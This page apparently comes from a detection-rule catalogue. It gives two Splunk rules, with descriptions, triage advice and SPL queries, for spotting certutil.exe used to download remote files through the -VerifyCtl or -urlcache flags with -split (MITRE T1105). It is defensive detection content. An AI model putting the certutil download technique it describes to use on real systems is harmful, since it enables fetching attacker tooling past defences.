Techniques
Sample rules
CertUtil Download With VerifyCtl and Split Arguments
- source: splunk
- technicques:
- T1105
Description
Certutil.exe may download a file from a remote destination using -VerifyCtl
. This behavior does require a URL to be passed on the command-line. In addition, -f
(force) and -split
(Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for certutil.exe
to contact public IP space. \ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using -VerifyCtl
, the file will either be written to the current working directory or %APPDATA%\..\LocalLow\Microsoft\CryptnetUrlCache\Content\<hash>
.
Detection logic
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*verifyctl* Processes.process=*split*) OR Processes.process=*verifyctl* by Processes.dest Processes.user Processes.original_file_name Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `certutil_download_with_verifyctl_and_split_arguments_filter`
CertUtil Download With URLCache and Split Arguments
- source: splunk
- technicques:
- T1105
Description
Certutil.exe may download a file from a remote destination using -urlcache
. This behavior does require a URL to be passed on the command-line. In addition, -f
(force) and -split
(Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for certutil.exe
to contact public IP space. However, it is uncommon for certutil.exe
to write files to world writeable paths. During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question.
Detection logic
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*urlcache* Processes.process=*split*) OR Processes.process=*urlcache* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.original_file_name Processes.parent_process_id
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `certutil_download_with_urlcache_and_split_arguments_filter`